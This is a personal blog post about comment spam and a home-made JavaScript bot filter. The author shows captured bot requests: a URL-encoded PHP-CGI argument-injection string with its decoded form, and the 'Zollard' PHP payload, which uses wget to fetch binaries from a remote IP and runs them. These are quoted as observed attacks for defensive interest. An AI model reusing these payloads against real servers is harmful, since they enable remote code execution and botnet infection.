Year of the spam

At Google, they say they don't need Captcha anymore. If I had an iframe on virtually every website on the web, I could probably claim the same. I assume that if this is a factor in the method they use, then Facebook could also claim the same capability.

Google Plus, Facebook like

reCAPTCHA or captcha, is a system for preventing bots (automated scripts) from entering spam on your website. They are usually found in web forms.

For example, when you are adding a comment on an article, you are presented with a little challenge. Simple for humans and hard for bots. This will assure that automated scripts can't send you spam if they can't solve the challenge.

Spam can be one of the most annoying thing on your website. It can even be harmful.

I used to have a website that accepted users comments. When it was still new I monitored my comments and deleted spam regularly.

When I got a few users, I stopped monitoring. I built a small image generator to protect myself from spam, and forgot about it.

Six months later I received alert from Google Webmaster Tools. My home brewed captcha had been defeated. My website became a highly potent concentration of porn, viagra, and child porn key words.

In panic, I blocked all new comments. I couldn't just filter the comments that were spam so I deleted six month worth of entries.

I modified my image generator, added a little more complexity to fight those bots. To my surprise, it took less than a minute for it too to be defeated. So naturally, comments were disabled for good.


When I started this blog, I didn't think twice about comments. I went straight to a third party system: Disqus. I'm an programmer however. So in time, I decided to reinvent the wheel with my own commenting system.

One thing that most bots don't do, is run JavaScript. Simply making the comments require JavaScript to submit filtered out a large batch of spam bots. For those too tricky for me, I setup an easy switch to move any post back to Disqus.

Now that most if not all spam is blocked, it would be a shame to just let them go to waste. So since January of 2014, I have been saving every spam entry for further studies. I am shocked from all the data I gathered.

No, I don't mark any comment I disagree with as spam. I log all the POST request that are sent to fake links I generated. So far, I have:

The URLs are simple md5 hashes made from some of the post information. You can download them below if you want a nice little IP black list.

Download File

This is by no mean a full protection against spammers, captcha would work better. But it is interesting to note that most bots fail a simple JavaScript test.

Some spammers, who are real people try to sneak in some stuff manually. But those are easier to handle because they can only do so much.

I go through the trouble of approving the comment before it becoming permanent. And once I mark it as spam, the IP address is automatically flagged in the future.

What's in the data I collected.

You can download the list of data in SQL format below. So I won't be talking about all the viagra and cialis here. What interested me the most is the other data that also came along.

Download File

Here is one example:

/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E

After unescaping it unescape(urlstring) this is what you get:

/cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

There is a variation of this found in the list of requests. They target bugs in different versions of PHP, Wordpress, and many other frameworks.

Other ones came with more familiar data:

[<?php
echo_"Zollard";
$disablefunc_] =>  @ini_get("disable_functions");
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_resource($fp = popen($cmd,"r")))
  {
   $result = "";
   while(!feof($fp)) {$result .= fread($fp,1024);}
   pclose($fp);
  }
 }
 return $result;
}
myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://79.45.114.45:58455/armeabi;chmod  x /tmp/armeabi");
myshellexec("rm -rf /tmp/arm;wget -P /tmp http://79.45.114.45:58455/arm;chmod  x /tmp/arm");
myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://79.45.114.45:58455/ppc;chmod  x /tmp/ppc");
myshellexec("rm -rf /tmp/mips;wget -P /tmp http://79.45.114.45:58455/mips;chmod  x /tmp/mips");
myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://79.45.114.45:58455/mipsel;chmod  x /tmp/mipsel");
myshellexec("rm -rf /tmp/x86;wget -P /tmp http://79.45.114.45:58455/x86;chmod  x /tmp/x86");
myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://79.45.114.45:58455/nodes;chmod  x /tmp/nodes");
myshellexec("rm -rf /tmp/sig;wget -P /tmp http://79.45.114.45:58455/sig;chmod  x /tmp/sig");
myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");
?>

I did very little tests and accessing the ip address times out when you request through the browser. I will spend more time with it later.

This is why you have to make sure your server and applications are always up to date. These scripts go around the web testing old bugs on random servers.


There is something to learn here.


Comments

There are no comments added yet.

Let's hear your thoughts

For my eyes only